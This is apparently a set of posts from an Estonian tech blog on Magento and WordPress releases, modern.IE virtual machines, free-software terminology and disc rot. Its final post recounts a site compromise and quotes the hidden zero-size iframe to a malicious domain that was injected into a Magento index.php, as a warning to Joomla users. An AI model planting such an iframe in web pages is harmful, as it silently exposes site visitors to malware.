pronto.ee

Tomorrow will be cancelled due to lack of interest

Magento CE 1.9.0.1

Vaid kaks päeva pärast eelmise versiooni tulekut sai Magento täiendust ning värskeimaks numbriks tõusis 1.9.0.1. Uuendus parandab kaks väikest kuid väga olulist viga: esiteks ei saa klient enam ostukorvis kasutada mitte aktiivset kupongi ja teiseks väike parandus uuest responive kestas, mis pisemate ekraanide peal ei töötanud päris nii nagu oli plaanitud.

Magento CE 1.9.0

Magento

Magento

Seoses Las Vegases toimuva Imagin konverentsiga lasi Magento välja uue versiooni oma populaarsest e-poe platvormist mille tasuta variant kannab nüüd numbrit 1.9.0. Erinevalt kahest eelmisest versioonist (1.8.0 ja 1.8.1) sisaldas see päris mitut olulist muudatust. Vaatame, mida see uuendus endaga kaasa tõi.

PHP 5.4 tugi

Magento eelmine versioon tuli välja eelmise aasta detsembris. Selle aasta jaanuaris ilmus nendele lehele funktsionaalsuspaik, mis lubas lisada versioonidele alates 1.6.0 PHP 5.4 toe. Spetsialistide hinnangul sisaldab PHP 5.4 täiendusi, mis võivad kuni 28% kiirendada Magento kliendiliidest. Magento CE 1.9.0-le on see uuendus juba sisse ehitatud ning ainuüksi see täiendus võib olla argumendiks, miks korraline uuendustee ette võtta.

Piiriülene kaubandus

Täiendatud funktsionaalsus lihtsustab hindade ja maksude arvutamist piiriülese kabanduse puhul. Tegemist on täiendusega, mida päris mitmed e-poodnikud on nõudnud: võimalus jätta lõpphind kogu Euroopa Liidu sees samaks, kuigi erinevates riikides võivad olla maksumäärad erinevad.

PayPal

Ohtralt on lisandunud PayPaliga seotud uut funktsionaalsust, näiteks toetab Magento nüüd  funkctiooni nimega “Bill Me Later”, ehk maksa hiljem.

Sellega siiski uue funktsionaalsuse nimekiri ei lõppe ning lisaks kaasneb täiendusega hulgaliselt veaparandusi. Täpsemalt saab kõikidest uuendustest lugeda siit.

Mac ja Linux sõbralikult, näe, ulatavad Internet Explorerile käe

Internet Explorer 10

Internet Explorer 10

Suur osa (võimalik, et isegi üle poole) veebiarendusest toimub kas Mac OS X-i või mõne Linuxi distributsiooni rüpes. Ma ei hakka siinkohas seletama miks see nii on, aga kui see postitus tundub relevante, siis ei vajagi see vast täiendavaid kommentaare. Siiski kaasneb sellega üks suure mure — märkimisväärne osa Internetis kasutajatest pruugib endiselt (millegipärast) Internet Explorerit, mis paraku aga neis kahes operatsioonisüsteemis ei toimi. Samas on IE-l läbi aegade olnud tõsiseid probleeme ülejäänud veebibrauseritega ühte sammu astumisega, mis tekitab veebiarendajale vajaduse teha täiendavaid teste. Ehk teisisõnu: mida sina testid kui testi ei ole.

Õnneks pole asi siiski lootusetu ning appi tõttab vana hea virtualiseerimine, kuid paraku on virtualiseerimisel üks võrdlemise ebameeldib kõrvalnähtus — selleks, et jooksutada Internet Explorerit, peab virtuaalmasinas jooksutama Windowsi, mille litsents maksab aga raha. Selleks, et proovida vaid seda, kas veebileht paistab kasutajale normaalne, kaugelt liiga palju raha. Õnneks pole see dilemma (testida või mitte testida) jäänud märkamatuks ka Microsoftile ja nõnda ongi Redmond käivitanud projekti nimega modern.IE.

modern.IE kujutab ette ennast valitud sortimenti virtuaalmasinate tõmmiseid, kuhu on paigaldatud viimase piirini nuditud Windows, mis on mõeldud vaid Internet Exploreri käivitamiseks ning see tõmmis on arendajate jaoks tasuta.

modern.IE koduleht asub siin: www.modern.ie

Praegusel hetkel on tõmmised tehtud valmis kolme virtualiseerija jaoks: tasuta VirtualBoxi ning tasuliste Parallelsi ja VMWare jaoks. Tõmmised leiab kõigi olulisemate Internet Exploreri versioonide ja Windowsite jaoks. Hetkel on sortiment järgnev:

  1. Windows XP – IE6
  2. Windows XP – IE8
  3. Windows Vista – IE7
  4. Windows 7 – IE8
  5. Windows 7 – IE9
  6. Windows 7 – IE10
  7. Windows 7 – IE11 Preview
  8. Windows 8 – IE10
  9. Windows 8.1 – IE11 Preview

Tähelepanuks ka niipalju, et suur osa tõmmistest on allalaadimise hõlbustamiseks jagatud mitmesse faili. Esimene fail on tavaliselt .sfx laiendiga ja kui sellele anda käivitumisõigused (chmod u+x fail.sfx), siis on ta võimeline kogu asja lahti pakkima eeldusel, et kõik failid on samas kataloogis ja loetavad. Seejärel tuleb tegutseda nii nagu tõmmistega ikka tegutsetakse, näiteks VirtualBoxi puhul tuleb lahtipakkimisel tekkinud fail importida. Tähelepanuks veel niipalju, et alates Windows 7-st tuleks virtuaalmasinale eraldada mälu vähemalt 1024MB-i.

Head testimist.

WordPress v3.0.3

Wordpress

Kes arvas, et pääseb enne loetud päevade jooksul saabuvat suuremat versioonimuutust (v3.1) oma WordPressi installatsiooni uuendamisest, see arvaku uuesti. Vaid paar päeva pärast viimase (v3.0.2) veaparanduse ilmumist tõstis pead veel üks turvakonarus, mis seekord lubab mittelokaalsetel pahatahtlikel kasutajatel soovi korral teha asju, milleks neil õigusi ei ole.

Uusima versiooni leiab WordPressi koduleheküljelt ning soovi korral on seda võimalik alla laadida ka administreerimisliidese automaatse paigaldaja abil.

WordPress v3.0.2

Wordpress

Meeldetuletuseks niipalju, et järgmise suurema versiooniuuenduseni (v3.1) on jäänud vaid paar nädalat, on WordPressi tiim väljastanud parandusversiooni v3.0.2. Eelkõige on see uuendus vajalik nendele, kes kasutavad oma keskkonnas rohkem kui ühte sisuautorit ning mitte kõik neist pole samade õigustega. Selgub, et väiksemate õigustega kasutajal on võimalik WordPressi vigu kasutades endale suuremaid õiguseid kaaperdada ja potentsiaalselt sellega kurja teha.

Vaba vara?

Ma teen ettepaneku lõpetada sellise sõna nagu vabavara ebasihipärase kasutamise ära. Tegemist on tavaliselt väärtõlkega inglise keelest, kus sõna free tähendab üheaegselt nii “vaba” kui “tasuta”.

Miks ma sellest räägin? Ma räägin seda sellepärast, et sõna kasutus või väärkasutus mõjutab seda kuidas inimene suhtub ühte või teise tootesse. Tasuta tarkvara ehk freeware ei pruugi olla automaatselt avatud lähtekoodiga ega ka “vaba” vara. Näiteks Oracle Express (Oracle Database XE) on tasuta tarkvara, kuna selle eest ei pea sentigi lauale veeretama, ometigi pole see “vaba”, sest Oracle hoiab endale kõik sellega seotud õigused. Teisest küljest võttes ei tohi unustada, et isegi kui tootega antakse kaasa lähtekood, ei pruugi see seda automaatselt “vabaks” teha. Näiteks praktiliselt kogu PHP tasuline tarkvara on avatud lähtekoodiga ja ometigi mitte “vaba”.

Õigupoolest ei nimetaks ma vabaks varaks ka ühtegi GPL litsentsiga tarkvara, sest GPL seab paika päris jõhkrad reeglid kuidas seda tarkvara võib või ei või kasutada. Minu silmis on vabavara vaid public domain tarkvara, mille omaniku ja litsentsitingimusi kas ei ole võimalik tuvastada või on omanik loobunud kõikidest õigustest sellele. Taolist vara võib kasutada kuidas pähe tuleb — laiendada, muuta, müüa (juhul kui ostja leiab), jagada, jne. Kui omanik on teada siis võib talle viidata, aga ka selle jaoks pole mingit kohustust.

Nagu olen ma jõudnud välja punkti, et enamus tarkvara, mida traditsiooniliselt kiputakse Eestis vabavaraks nimetama ei ole teps mitte vaba, vaid hoopis a) avatud lähtekoodiga (open source) ja b) tasuta (freeware).

Disc rot

Disc rot

Disc rot

Pakkisin hiljuti ühe kasti lahti, mis sisaldas erinevatel aegadel sinna paigutatud andmeid, põletatuna CD-de ja DVD-de peale. Ma proovisin paari vanemat neist lugeda, aga edu selles valdkonnas oli üsna vahelduv — üle 10 aasta tagasi kirjutatud CD-d ei pruugi sugugi enam loetavad olla. Üks termin, mida sellistel puhkudel kasutatakse on disc rot, ehk kettakõdu.

Seoses sellega tekkiski mul küsimus: kas Mac OS-i jaoks on olemas mingit tarkvara, mis võimaldab selliseid kettaid tuvastada. Ma pean silmas seda, et pistad ketta masinasse, arvuti suristab natuke aega ja ütleb, et sellelt kettalt on lugemisega raskusi. Taoline asi võimaldab mul tuvastada säilivusprobleeme juba algfaasis, teha vajalikust kraamist koopiaid ja mittevajaliku kraami ilma igasuguste südametunnistusepiinadeta prügikasti toimetada.

I got pwnd!

Joomla

Joomla

Kuradi raisakurat! Teate, alalõpmata kirjutatakse õudusjuttu sellest, kuidas üks või teine viirus kurja teeb ja kuidas üks või teine worm kuskil asju vasakule tõstab. Enamasti on need kirjutatud inimeste poolt, kes teavad sellistest asjadest kolmandate inimeste vahendusel ja kelle eesmärk on pakkuda põnevust inimestele, kes jutust aru ei saa. Samad inimesed kirjutavad lehtedesse ka seiklusjutte sellest, kuidas “Arctic Sea”-ga tiibrakette veetakse. Intrigeeriv, aga peaaegu alati ainult teoreetiline lugemine.

Täna siis märkasin, et millegipärast minu mõlemad Magento installatsioonid on käpa maha pannud veateatega, mis viitab justkui oleks programmikood vigane. Viskasin Magento index.php-le pilgu peale ja etskae: faili lõppu on tekkinud iseeneseslikult järgnev rida:

<iframe src="http://google-analyze.org/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Paanika! Kiire otsing näitas, et tegemist on selge pahavaraga, mis kuidagi mu masinasse on pugenud ja seal oma valgustkartvaid tegusi sooritab. Edasine otsing viitas sellele, et suure tõenäosusega on tegemist ka SQL injectionist tingitud rünnakuga. Veelgi edasisem otsing tuvastas masinast mingil iidsel ajal sinna testimiseks üles pandud Joomla installatsiooni, mis osutuski ründevektori alguspunktiks.

Soovitus nüüd kõigile, kes Joomlat kasutavad. Vaadake, ega teil kusagil failides iframe-ga algavat rida ei ole, mida te ei mäleta sinna pannud olevat. See aadress, mis src sees on, võib olla teine, kuid suures plaanis peaks välimus umbes sama olema. Minu puhul jäi see muudatus vahele ainult Magento eripärade tõttu, enamustel jääkski see ilmselt kahe silma vahele. Joomla on meil üsna levinud tarkvara ja ma ei usu mitte, et igaüks viitsib oma installatsioone regulaarselt uuendada.

Update early, update often!